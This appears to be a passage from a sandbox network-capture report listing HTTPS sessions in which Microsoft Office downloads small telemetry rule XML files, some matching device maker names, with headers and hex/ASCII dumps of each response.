                31192.168.2.44977713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:49 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:49 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:49 GMT
                Content-Type: text/xml
                Content-Length: 499
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                ETag: "0x8DC582B98CEC9F6"
                x-ms-request-id: 40323690-a01e-0002-0100-175074000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012649Z-1657d5bbd48f7nlxc7n5fnfzh000000002f0000000008a3z
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:49 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                32192.168.2.44977813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:49 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:49 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:49 GMT
                Content-Type: text/xml
                Content-Length: 415
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                ETag: "0x8DC582B988EBD12"
                x-ms-request-id: c530354f-501e-0016-5013-17181b000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012649Z-1657d5bbd48762wn1qw4s5sd3000000002m000000000nsr9
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:49 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                Session IDSource IPSource PortDestination IPDestination Port
                33192.168.2.44977913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:49 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:49 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:49 GMT
                Content-Type: text/xml
                Content-Length: 471
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                ETag: "0x8DC582BB5815C4C"
                x-ms-request-id: 7cec3a6f-e01e-0033-3414-174695000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012649Z-1657d5bbd48xsz2nuzq4vfrzg800000002rg000000003weu
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:49 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                34192.168.2.44978013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:49 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:49 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:49 GMT
                Content-Type: text/xml
                Content-Length: 419
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                ETag: "0x8DC582BB32BB5CB"
                x-ms-request-id: d415a278-e01e-0051-6efe-1684b2000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012649Z-1657d5bbd48wd55zet5pcra0cg00000002v0000000003bk2
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:49 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                Session IDSource IPSource PortDestination IPDestination Port
                35192.168.2.44978113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:49 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:49 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:49 GMT
                Content-Type: text/xml
                Content-Length: 494
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                ETag: "0x8DC582BB8972972"
                x-ms-request-id: 7c825ef0-601e-0001-5f02-17faeb000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012649Z-1657d5bbd48tnj6wmberkg2xy800000002ug00000000k3ny
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:49 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                36192.168.2.44978213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:50 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:50 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:50 GMT
                Content-Type: text/xml
                Content-Length: 420
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                ETag: "0x8DC582B9DAE3EC0"
                x-ms-request-id: 10df1352-f01e-00aa-105a-178521000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012650Z-1657d5bbd48sdh4cyzadbb374800000002gg00000000suxe
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:50 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                Session IDSource IPSource PortDestination IPDestination Port
                37192.168.2.44978413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:50 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:50 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:50 GMT
                Content-Type: text/xml
                Content-Length: 427
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                ETag: "0x8DC582BA909FA21"
                x-ms-request-id: a62739ea-301e-005d-6402-17e448000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012650Z-1657d5bbd487nf59mzf5b3gk8n00000002dg00000000c1df
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                Session IDSource IPSource PortDestination IPDestination Port
                38192.168.2.44978313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:50 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:50 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:50 GMT
                Content-Type: text/xml
                Content-Length: 472
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                ETag: "0x8DC582B9D43097E"
                x-ms-request-id: b27116a7-a01e-003d-3a00-1798d7000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012650Z-1657d5bbd48t66tjar5xuq22r800000002s000000000f2vv
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                39192.168.2.44978513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:50 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:50 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:50 GMT
                Content-Type: text/xml
                Content-Length: 486
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                ETag: "0x8DC582B92FCB436"
                x-ms-request-id: 92e59db7-001e-002b-6700-1799f2000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012650Z-1657d5bbd48wd55zet5pcra0cg00000002u0000000007bdh
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:50 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                40192.168.2.44978613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:50 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:50 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:50 GMT
                Content-Type: text/xml
                Content-Length: 423
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                ETag: "0x8DC582BB7564CE8"
                x-ms-request-id: a2d01d3c-801e-0083-4800-17f0ae000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012650Z-1657d5bbd482lxwq1dp2t1zwkc00000002k000000000bvdk
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:50 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                Session IDSource IPSource PortDestination IPDestination Port
                41192.168.2.44978713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:51 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:51 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:51 GMT
                Content-Type: text/xml
                Content-Length: 478
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                ETag: "0x8DC582B9B233827"
                x-ms-request-id: 4dd19665-401e-005b-7705-179c0c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012651Z-1657d5bbd48cpbzgkvtewk0wu000000002zg000000000nne
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:51 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                42192.168.2.44978813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:51 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:51 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:51 GMT
                Content-Type: text/xml
                Content-Length: 404
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                ETag: "0x8DC582B95C61A3C"
                x-ms-request-id: 151ca1e1-401e-0029-2b03-179b43000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012651Z-1657d5bbd48cpbzgkvtewk0wu000000002yg0000000044s3
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
